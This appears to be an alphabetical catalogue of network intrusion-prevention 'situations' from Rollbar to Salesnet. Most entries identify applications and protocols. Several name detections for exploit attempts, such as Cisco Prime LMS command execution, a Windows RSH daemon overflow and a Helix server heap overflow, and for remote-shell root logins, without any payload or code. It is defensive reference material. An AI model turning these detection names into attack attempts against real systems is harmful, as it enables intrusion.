Back to top

Rollbar

About this situation: Application Rollbar detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rollbar is a full-stack error monitoring platform for web and mobile applications. It helps developers find and fix bugs.
Back to top

Rollbase

About this situation: Application Rollbase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Progress Rollbase is a cloud platform for the development and delivery of mobile and cloud-based business applications using point-and-click, drag-and-drop tools with minimal coding.
Back to top

Roojoom

About this situation: Application Roojoom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Roojoom is an online marketing intelligence platform that increases conversion and engagement through personal Content Journeys across the customer life-cycle.
Back to top

Room7

About this situation: Room7 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

RosenPub

About this situation: Application RosenPub detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rosen Publishing, Inc. is an independent educational publishing house to serve the needs of students in grades Pre-K -12 with high interest, curriculum-correlated materials.
Back to top

Rosslyn-Data-Technologies

About this situation: Application Rosslyn-Data-Technologies detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RA.Pid is a web-based Automated Spend Analytics Platform (W-ASAP), pushes spend data and contextual information to you and your colleagues simultaneously via a shared portal, without manual intervention.
Back to top

Rotary-International

About this situation: Application Rotary-International detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rotary International is an international service organization whose stated purpose is to bring together business and professional leaders in order to provide humanitarian services, encourage high ethical standards in all vocations, and help build goodwill and peace in the world.
Back to top

Rotten-Tomatoes

About this situation: Rotten Tomatoes usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-839-5242
Last changed: sgpkg-ips-839-5242
Description: Rotten Tomatoes is a site for film and television reviews.
Back to top

Roundcube

About this situation: Application Roundcube detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Roundcube is a web-based IMAP email client. Roundcube's most prominent feature is the pervasive use of Ajax technology to present a more fluid and responsive user interface than that of traditional webmail clients.
Back to top

RouteOne-CAS-Login

About this situation: Application RouteOne-CAS-Login detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RouteOne is the One thousands of dealers and finance sources count on every day to provide automobile financing system solutions.
Back to top

Rovio

About this situation: Content for Rovio's games detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-769-5211
Description: Content for Rovio's games have been detected. Rovio is author of the popular Angry Birds game series among others.
Back to top

Rovio-Angry-Birds

About this situation: Rovio Angry Birds series usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1638-5242
Description: Angry Birds is a franchise of popular video games.
Back to top

RSA

About this situation: Application RSA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RSA is a provider of security solutions for business acceleration and security activities.
Back to top

RSA-eBusiness

About this situation: Application RSA-eBusiness detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RSA eBusiness Solutions is a browser-enabled, fully integrated Supply Chain and Financial Management solution (multi-lingual, multi-warehouse, multi-currency, EDI-enabled), in either a SaaS (Software as a Service) or traditional licensing format.
Back to top

RSH_CS-Cisco-Prime-Lan-Management-Solution-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Cisco Systems Prime LAN Management Solution detected
Context: Shell (cmd) Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime LAN Management Solution, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Cisco-Prime-Lan-Management-Solution-Remote-Command-Execution
Description:
Back to top

RSH_CS-Cisco-Prime-Lan-Management-Solution-Remote-Command-Execution-2

About this situation: An attempt to exploit a vulnerability in Cisco Systems Prime LAN Management Solution detected
Context: Shell (cmd) Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime LAN Management Solution, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: Cisco-Prime-Lan-Management-Solution-Remote-Command-Execution
Description:
Back to top

RSH_CS-Login-Attempt

About this situation: A Remote Shell login attempt detected
Context: Shell (cmd) Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Description:
Back to top

RSH_CS-Root-Login-Attempt

About this situation: A Remote Shell root login attempt detected
Context: Shell (cmd) Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-567-5211
Description:
Back to top

RSH_CS-Windows-RSH-Daemon-Buffer-Overflow

About this situation: Detected an attempt to exploit a vulnerability in Windows RSH Daemon
Context: Shell (cmd) Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows RSH Daemon, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-485-5211
Last changed: sgpkg-ips-485-5211
Vulnerability: Windows-RSH-Daemon-Buffer-Overflow
Description:
Back to top

RSH_SS-Successful-Login

About this situation: A Remote Shell login detected
Context: Shell (cmd) Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Description:
Back to top

RSM

About this situation: Application RSM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RSM is the provider of audit, tax and consulting services focused on the middle market.
Back to top

RSsoftware

About this situation: Application RSsoftware detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RS Software provide customized software solutions to the payments industry.
Back to top

RssReader

About this situation: RssReader usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-1638-5242
Description: RssReader is a free "RSS" reader program which is used to read RSS and Atom news feeds.
Back to top

rstatd

About this situation: rstatd usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: Rstatd server allows clients to query linux system performance statistics remotely. The server daemon is called rpc.rstatd and relies on ONC RPC and Portmap for communication.
Back to top

Rsvp.com.au

About this situation: RSVP.com.au usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Rsync

About this situation: Rsync traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-595-5211
Description: Rsync is an application/protocol for synchronizing files and directories from one location to another.
Back to top

RTF File

About this situation: RTF File detected
Context: File Stream Redirection
Severity: 2
Tags: File Type Identification, Content Identification, Document, RTF Document
First detected in: sgpkg-ips-486-5211
Last changed: sgpkg-ips-486-5211
Description:
Back to top

RTMPT

About this situation: RTMPT traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Tunneling
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-628-5211
Description: Real Time Messaging Protocol (RTMP) is the protocol for communication between a Flash player and a server. RTMP provides multiplexing and packetizing services to stream multimedia data between the peers. In order to make RTMP communication work behind a restricted firewall, RTMP can be tunnelled inside HTTP. The specification is recognized as RTMP-Tunnelled (RTMPT).
Back to top

RTP-Dynamic

About this situation: Real-Time Transport Protocol traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1744-5242
Last changed: sgpkg-ips-1744-5242
Description: RTP (Real-Time Transport Protocol) is a network protocol used for delivering audio and video streams. This network application detects RTP streams that use dynamic payload type. Dynamic payload types may be used both by audio and video streams. NOTE: Non-RTP traffic may occasionally be falsely identified by the application, especially if the traffic has high entropy.
Back to top

RTSP

About this situation: RTSP traffic
Context: Application Context
Severity: 1
Tags: Protocols, Media, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: Real Time Streaming Protocol (RTSP) usage detected. RTSP is a network control protocol that is used for streaming audio and video over IP networks.
Back to top

RTSP_Client-Request

About this situation: RTSP client request was seen
Context: RTSP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Description: An RTSP request sent by the client was seen.
Back to top

RTSP_Client-Response

About this situation: RTSP client response was seen
Context: RTSP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Description: An RTSP response sent by the client was seen.
Back to top

RTSP_Client-Syntax-Error

About this situation: Invalid RTSP client message
Context: RTSP without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Description: The data sent by the client could not be parsed as an RTSP message. The message may contain a syntax error, or the client may not be using RTSP at all.
Back to top

RTSP_CS-RealNetworks-Helix-Server-RTSP-Set_Parameter-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in RealNetworks Helix Mobile Server detected
Context: RTSP TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealNetworks Helix DNA Server, RealNetworks Helix Server, RealNetworks Helix Mobile Server, Any Operating System not specific, RealNetworks Helix Server not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1560-5242
Vulnerability: RealNetworks-Helix-Server-RTSP-Set_Parameter-Heap-Buffer-Overflow
Description:
Back to top

RTSP_Invalid-Client-Method

About this situation: Invalid method seen in RTSP client request
Context: RTSP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Description: The client sent a request with an RTSP method not specified to be used by clients. Risk analysis: Risk level is low.
Back to top

RTSP_Invalid-Server-Method

About this situation: Invalid method seen in RTSP server request
Context: RTSP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Description: The server sent a request with an RTSP method not specified to be used by servers. Risk analysis: Risk level is low.
Back to top

RTSP_Server-Request

About this situation: RTSP server request was seen
Context: RTSP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Description: An RTSP request sent by the server was seen.
Back to top

RTSP_Server-Response

About this situation: RTSP server response was seen
Context: RTSP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Description: An RTSP response sent by the server was seen.
Back to top

RTSP_Server-Syntax-Error

About this situation: Invalid RTSP server message
Context: RTSP without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Description: The data sent by the server could not be parsed as an RTSP message. The message may contain a syntax error, or the server may not be using RTSP at all.
Back to top

RTSP_SS-Microsoft-Media-Player-Audio-Sampling-Rate-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Media Player detected
Context: RTSP TCP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Player, MS2008-09, CVE2008, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1560-5242
Vulnerability: Microsoft-Media-Player-Audio-Sampling-Rate-Memory-Corruption
Description:
Back to top

RTSP_Stream-Destination-Not-Client

About this situation: Address of streaming destination is not client
Context: RTSP without parameters
Severity: 2
Tags: Suspected Denial of Service
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Description: The media stream destination specified in a SETUP request does not match the RTSP client's IP address. This may be a potential DDoS attack attempt. Risk analysis: Risk level is medium.
Back to top

RTSP_Unknown-Client-Method

About this situation: Unknown method seen in RTSP client request
Context: RTSP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Description: The method seen in an RTSP client request is not a method specified by RTSP 1.0 [RFC 2326]. Risk analysis: Risk level is low.
Back to top

RTSP_Unknown-Server-Method

About this situation: Unknown method seen in RTSP server request
Context: RTSP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Description: The method seen in an RTSP client request is not a method specified by RTSP 1.0 [RFC 2326]. Risk analysis: Risk level is low.
Back to top

RTSP_Unknown-Version

About this situation: Unknown RTSP version seen in RTSP request
Context: RTSP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Description: An unknown RTSP version was seen in an RTSP request. Risk analysis: Risk level is low.
Back to top

Rubicon-Project

About this situation: Rubicon Project traffic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1641-5242
Description: Rubicon Project is a company specialized in automating the buying and selling of advertising.
Back to top

RubyGems

About this situation: RubyGems usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-595-5211
Description: RubyGems package manager usage has been detected.
Back to top

RumbleTalk

About this situation: Application RumbleTalk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RumbleTalk offers a unique html5 chat room with various chat themes and the ability to create your own css stylish skin.
Back to top

Rundll32.exe

About this situation: Endpoint Context Agent based rundll32.exe detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: A network connection launched by the Windows system process rundll32.exe was detected. Rundll32.exe is a utility program in Microsoft Windows which can be used for invoking a function exported from a DLL. The program is available for generic use, and can thus be invoked by malicious parties as well.
Back to top

Runescape

About this situation: RuneScape usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

RunKeeper

About this situation: RunKeeper usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-754-5211
Description: RunKeeper is a mobile application for GPS-based sports and activity tracking. The tracked activities are uploaded to runkeeper.com.
Back to top

RunMyProcess

About this situation: Application RunMyProcess detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Fujitsu RunMyProcess platform makes use of business process management (BPM) concepts to provide a unique mix of structured workflows, integration and agility helping customers from all around the world meet their evolving business needs.
Back to top

Runnable

About this situation: Application Runnable detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Runnable provides building tools to help developers run code with ease. Edit, run, and share live code in your browser.
Back to top

Runtastic

About this situation: Runtastic usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-773-5211
Description: Runtastic usage has been detected.Runtastic is a sports tracking service.
Back to top

RuntimeBroker

About this situation: Endpoint Context Agent based RuntimeBroker.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-986-5242
Description: A network connection launched by the Windows system process RuntimeBroker.exe was detected. RuntimeBroker.exe is used by Windows to check the permissions for apps downloaded from Windows Store.
Back to top

Russia-Today

About this situation: Russia Today usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1764-5242
Description: Russia Today usage detected. Russia Today is an international media company operated by state owned news agency RIA Novosti.
Back to top

Rxproxy

About this situation: Rxproxy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1128-5242
Description: Rxproxy is a free HTTP proxy that can be used to surf the Internet anonymously and to circumvent access limitations.
Back to top

Rynga

About this situation: Rynga usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-628-5211
Description: Rynga is a voice-over-ip (VoIP) provider for international phone calls.
Back to top

Rypple

About this situation: Rypple usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: Rypple is a software-as-a-service for employee feedback. Staff can give each other feedback and managers can coach their employees and manage goals.
Back to top

Ryze

About this situation: Application Ryze detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ryze.com is social networking website designed to link business professionals, particularly new entrepreneurs.
Back to top

S-Pankki

About this situation: S-Pankki usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1764-5242
Description: S-Pankki usage detected. S-Pankki is a finnish banking service.
Back to top

S3group

About this situation: Application S3group detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: S3 Group is a provider of products, solutions and professional services to the Digital TV, Connected Health and Semiconductor industries. S3 Group success is built on our extensive portfolio of domain specific knowledge, state-of-the art electronics and software engineering design technology expertise, customisable IP, partner relationship and professional project and product management.
Back to top

S3Stat

About this situation: Application S3Stat detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: S3stat is a service that takes the detailed server access logs provided by Amazon's CloudFront and Simple Storage Service (S3), and translates them into human readable statistics, reports and graphs.
Back to top

Saastopankki

About this situation: Saastopankki usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1764-5242
Description: Saastopankki usage detected. Saastopankki is a finnish bank.
Back to top

Saasu

About this situation: Saasu usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Saasu provides a Software as a Service online accounting software.
Back to top

Saba-Centra-Meeting

About this situation: Saba Centra Meeting usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Saba Centra works on any PC, Mac, or Linux desktop or laptop, and across all major browsers. People can also use Saba Centra, with a rich participant interface, on their Apple iPhone and iPad. And people can use economical Voice over IP (VoIP), traditional teleconference, or a mix in any session. Saba Centra also features selectable High Definition and Super High Definition VoIP, which allows users to hear participants voices at over twice the quality of a land line based phone call.
Back to top

Saeker-Software

About this situation: Application Saeker-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Saeker Software is an online system that allows companies of any size to maintain a level of health and safety compliance across one or more premises.
Back to top

Safari-Books-Online

About this situation: Application Safari-Books-Online detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Safari Books Online is a digital library.
Back to top

SafeCart

About this situation: Application SafeCart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SafeCart is the credit card payment systems, providing a secure method for internet shoppers to purchase downloadable software, ebooks, membership website access and other digital products.
Back to top

SafeCopy-Backup

About this situation: Application SafeCopy-Backup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SafeCopy online backup providing one account for all your computers. Backup, Share and Access your files securely from anywhere: Mac, PC, secure web browser and iPhone.
Back to top

Safenet

About this situation: Application Safenet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SafeNet is a provider in information security. SafeNet protects its customers valuable assets, including identities, transactions, communications, data and software licensing, throughout the data lifecycle.
Back to top

Safety-Concepts

About this situation: Application Safety-Concepts detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Safety Concepts offers WHS compliance software and applications for safety professionals and business owners.
Back to top

Safety-In-Your-Hand

About this situation: Application Safety-In-Your-Hand detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Safety In Your Hand utilizes the PDCA Cycle to integrate maintenance, production, occupational and environmental safety.
Back to top

SafetyCulture

About this situation: Application SafetyCulture detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SafetyCulture makes safety inspection app. It helps to manage teams and inspections.
Back to top

Safeway

About this situation: Application Safeway detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Safeway is online shop for groceries, find out about grocery stores, get health and nutritional information, and find all recipes and meals ideas.
Back to top

Sage-ACT!

About this situation: Application Sage-ACT! detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Act
Back to top

Sage-Virtual-Terminal

About this situation: Application Sage-Virtual-Terminal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sage provides small and medium sized organisations with a range of easy-to-use business management software and services - from accounting and payroll, to enterprise resource planning, customer relationship management and payments.
Back to top

SageMathCloud

About this situation: Application SageMathCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SageMathCloud is an open source web-based environment for using Sage, IPython, R, LaTeX, a terminal, and much more for mathematical research and teaching.
Back to top

SailPlay

About this situation: Application SailPlay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SailPlay is a b2c marketing automation platform that helps retailers to build loyalty programs and set mass and triggered email campaigns.
Back to top

sailpoint

About this situation: Application sailpoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SailPoint is the fastest-growing, independent identity and access management
Back to top

Salary.com

About this situation: Application Salary.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Salary.com is provider of on-demand compensation and talent management solutions.
Back to top

Sales-and-Orders

About this situation: Application Sales-and-Orders detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sales and Orders is Management Software for Google Shopping that specializes in increasing profit for E-Commerce.
Back to top

Sales-Engine

About this situation: Application Sales-Engine detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sales Engine International drives B2B sales with Marketing as a Service, combining marketing automation, content creation and campaign execution.
Back to top

Salesboom.com

About this situation: Salesboom.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This CRM allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Salesforce File Download

About this situation: Salesforce file download detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1859-5242
Last changed: sgpkg-ips-1859-5242
Description: Salesforce file download detected. Requires decryption to work.
Back to top

Salesforce File Upload

About this situation: Salesforce file upload detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1859-5242
Last changed: sgpkg-ips-1861-5242
Description: Salesforce file upload detected. Requires decryption to work.
Back to top

Salesforce-Desk

About this situation: Salesforce Desk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: This application combines multi-channel customer service support by email, telephone, and social media on computers and mobile devices. Source: Wikipedia
Back to top

Salesforce.com

About this situation: Salesforce.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1374-5242
Description: Salesforce provides for example a customer relationship management (CRM) product.
Back to top

SalesforceIQ

About this situation: Application SalesforceIQ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SalesforceIQ
Back to top

Salesformics

About this situation: Application Salesformics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Salesformics is an all-in-one customer relationship manager (CRM), sales and marketing automation solution.
Back to top

SalesFUSION360

About this situation: Application SalesFUSION360 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Salesfusion is SaaS marketing automation software solution serving B2B marketers.
Back to top

Salesjunction

About this situation: SalesJunction usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This web CRM allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

SALESmanago-Marketing-Automation

About this situation: Application SALESmanago-Marketing-Automation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SALESmanago Marketing Automation is a cloud based marketing automation platform. It offers a suite of products for marketers including website visitor identification and tracking, e-mail marketing with personalized dynamic e-mails and product offers, dynamic website content, and personalization for ad networks and direct sales channels.
Back to top

Salesnet

About this situation: Application Salesnet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
